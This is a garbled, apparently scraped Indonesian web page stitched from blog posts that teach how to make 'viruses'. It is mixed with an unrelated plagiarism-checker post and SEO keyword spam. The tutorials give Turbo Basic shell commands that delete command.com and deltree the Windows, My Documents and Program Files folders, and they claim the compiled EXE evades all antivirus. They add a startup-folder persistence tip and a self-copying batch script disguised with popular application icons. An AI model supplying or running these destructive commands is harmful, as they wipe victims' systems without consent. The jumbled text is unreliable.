Cara membuat program perusak (Seperti Virus) Penulis peduli dengan para newbie yang sedang belajar pemograman

sekaligus penulis jugapeduli dengan para progammer yang belum mengenal bahasa BASIC (Maklum kebanyakan progammerpada langsung lompat ke Pascal, C dan lainnya). Membuat program perusak (seperti virus) merupakan keinginan sebagian para pemula komputer,tapi bagaimana mereka bisa membuat kalau mereka tidak tahu bahasa pemograman sama sekali,anda jangan resah untuk masalah ini karena saat ini penulis akan mengajarkan anda caramembuat program perusak ( seperti virus) yang sangat sederhana sekali tapi sangat mematikanbahkan bisa dikatakan lebih mengerikan dari program perusak manapun. Pertama kali skill yang anda butuhkan adalah dasar DOS, tanpa ini anda akan sulit untuk berkreasi dalam membuat program ini tapi jika anda tidak tahu dasar perintah DOS maka anda cukup copy paste saja, bahasa pemograman yang akan kita pakai adalah Turbo Basic v1.0, anda dapat mendownloadnya di Google atau cari dirental CD. Jika anda buta pemograman Turbo Basic maka anda masuk ke Edit lalu anda tulis Source Code program perusak. shell "Perintah DOS" dengan diawali kata shell maka anda dapat menjalankan perintah DOS pada program, misal anda membuat : shell "c:" shell "cd\" shell "del command.com" Diatas adalah contoh menghapus DOS pada DOS Classic, Windows 95/98 sehingga pengguna komputer tidak dapat booting, kita contohkan yang lain. shell "c:" shell "cd\" shell "deltree /y mydocu~1" shell "deltree /y windows" shell "deltree /y progra~1" Diatas adalah contoh menghapus Directory My Document, Windows dan Program Files, sangat

hingga yang berbahaya .BAS. setelah itu masuk ke pilihan compile lalu anda enter. caranya pilih File lalu Save lalu beri nama filenya misal VIRUS. Tips Membuat Virus Sendiri Membuat virus? Berbahaya enggak? Tentu saja virus berbahaya. maka source code tersebut akan menjadi file EXE. hehe Tujuan dari tutorial ini adalah agar kita lebih waspada terhadap berbagai file dengan ekstensi *. caranya pilih Options lalu pilih Compile to EXE file.exe tersebut 100% dinyatakan bebas virus dari berbagai jenis Antivirus. setelah itu baru kita mengcompile source code tadi. namun tutorial kali ini akan membahas cara membuat virus sederhana yang dari paling tidak berbahaya.fatal bukan ? Setelah anda selesai membuat programnya maka anda save dahulu. dari tutorial diatas.exe meskipun file *. perlu diketahui bahwa BELUM ADA SATU ANTIVIRUS DIDUNIA INI DAPAT MENDETEKSI PROGRAM INI ADALAH VIRUS jadi anda bebas mengcopykan program ini ke komputer manapun yang anda suka kecuali komputer berbasis non DOS atau Windows. Jika file EXE tersebut dijalankan maka komputer anda akan menjalankan perintah DOS pada program. anda dapat berkreasi sendiri bagaimana virus buatan anda dapat berjalan sesuai dengan anda inginkan.

Pilih saja salah satu (Yes atau No)."Warning") 3. Incoming search: cara membuat virus facebook.cara membuat virus dan anti virusnya.cara membuat virus hp sederhana.tips membuat virus.Cara membuat Virus Sendiri. Buka Notepad 2.buat virus untuk ponsel.cara membuat sms virus. Jalankan Virusnya 5.buat virus berbahaya.cara membuat virus trojan dengan notepad.bikin virus bobol net.cara buat virus sendiri.cari cara membuat virus program.Virus . Press YES to format your hard disk now or press NO to format your hard disk after system reboot".membuat virus di komputer. Save dengan format .cara membuat skrip virus hp.cari virus berbahaya.buat virus virus lucu.membuat virus facebook.download ebook cara membuat virus komputer.tutorial membuat virus sederhana beserta anti virusnya.trik membuat anti virus sendiri.tip trik buat virus sms hp.software buat bikin virus hp.vbs).vbs Sederhana weeeweee Langkah-langkah 1.20. Dan jika mau program itu aktif ketika komputer startup.cara buat virus hp. letakkan programnya di C:\Documents and Settings\*namauser*\Start Menu\Programs\Startup.tutorial buat virus.membuat virus dengan notepad yang membahayakan. Note : Pesan yang muncul bisa diganti-ganti.membuat virus pencuri pulsa.Cara membuat virus hp yang sederhana.membuat virus di facebook.CARA BUAT SMS VIRUS.cara buat virus facebook. Tidak akan terjadi apa-apa kok.vbs (ex : virus1.cara format windows linup. Akan muncul pilihan yes or no. Simpan juga dengan format all file 4.CARA membuat virus yang lucu unik. Copy Code dibawah ini lol=msgbox ("Warning a virus has been detected on your PC.cara membuat virus .membuat virus berbahaya tanpa aplikasi.

tapi lanjutannya gw bahas di postingan selanjutnya ya! =D Silahkan mencoba dan selamat membaca! =] Cara Membuat Virus Komputer Palsu June 26. 2. tapi mungkin bisa meninggalkan lebam ato bekas tangan diwajah anda . Kini kita bisa melacak "sang pujangga plagiator" dengan mudah kok.com. Banyak sekali "blogger-blogger malas" yang kerjaannya hanya menyalin tulisan dari blog lain dan mengklaim bahwa itu adalah postingan buatan mereka. Teknologi Membuat virus komputer palsu untuk sekedar iseng atau untuk menjaili teman anda. eh dengan seenaknya postingan kalian dicomot oleh orang lain.blogspot.copyscape. menyusun kata-kata untuk diposting.cara membuat virus semua HP. Jika ada blog atau website yang terbukti secara sah dan meyakinkan hanya menyalin postingan kalian secara utuh. lalu klik Go! 3.virus sms handphone Penjiplakan sebuah postingan atau artikel memang banyak sekali ditemui di dunia maya. 4. maka Copyscape akan mengeluarkan list atau daftar blog yang dicurigai sebagai plagiat.cara membuat virus pada facebook com.cara membuat virus pencuri pulsa.e-blogchannel. so Take Your Own Risk !!!! virus 1 pertama buka notepad kemudian ketik . 2010 · Posted in Serba serbi. mau tahu caranya? =] Banyak sekali "blogger-blogger malas" yang kerjaannya hanya menyalin tulisan dari blog lain dan mengklaim bahwa itu adalah postingan buatan mereka. lalu ketikkan alamat ini http://www.com/. Tapi kini kita bisa melacak siapa saja yang menyalin tulisan kita. kalian tinggal menghubunginya untuk meminta pertanggungjawabannya mengenai postingan plagiatnya tersebut. Buka browser kalian. namun kalian bisa mencoba mencocokannya sendiri apakah situs itu memang benar-benar menyalin tulisan kalian seluruhnya atau tidak. apabila kalian sudah capek-capek mencari ide. 100% aman dan nggak akan meninggalkan kerusakan pada komputer yang menjalankan script ini.komputer. misalnya http://www. Coba bayangkan. apalagi tanpa mencantumkan sumber/backlink! Tentunya kalian akan merasa amat jengkel dengan si penyalin tersebut. Masukkan alamat/url blog kalian. =] Ayo hentikan plagiarisme! Bukankah akan lebih membanggakan apabila kita mendapatkan suatu penghargaan dari hasil karya kita sendiri? =] Sebenarnya masih ada cara lagi untuk melindungi postingan kalian dari plagiarisme. caranya: 1. Jika terdapat banyak kesamaan kalimat.

bat”) do copy %%i+c:\tmp. kemudian ganti icon-nya. virus2 Ini virus jadi-jadian yang paling OK tinggal download di sini. WMP.NT echo VIRUS DETECTED pause echo DELETING VIRUS pause echo FAILED TO DELETE THE VIRUS pause echo CONTACTING THE ANTIVIRUS pause echo FAILED pause echo FAILED :1 dir /s copy c:\tmp. yaitu dengan cara klik kanan. ekstensinya harus . tapi sebelumnya buat shortcut ke program virus palsu tadi.bat. klik properties cari icon yang diinginkan. untuk menghentikan virus palsu tadi dengan cara tekan Ctrl+C.bat goto 1 save as virus. YM dll. unzip.@echo off echo checking system: echo for %%i in (“*.bat c:\docum~1\%username%\desktop\greatgame_%random%. klik kanan shortcut klik properties ganti iconnya. winamp. atau menggunakan taskmanager. Virus ini nggak bisa di stop namun akan berhenti sendiri setelah .bat di desktop atau yang lainnya. buat shortcutnya di desktop dan ganti iconnya denganicon aplikasi yang sering digunakan misalnya browser. lebih baik pakai iconnya IE atau FF sesuaikan namanya.bat %%i >c:\windows\system32\autoexec.

beberapa menit. Enjoy…… .

Sign up to vote on this title
UsefulNot useful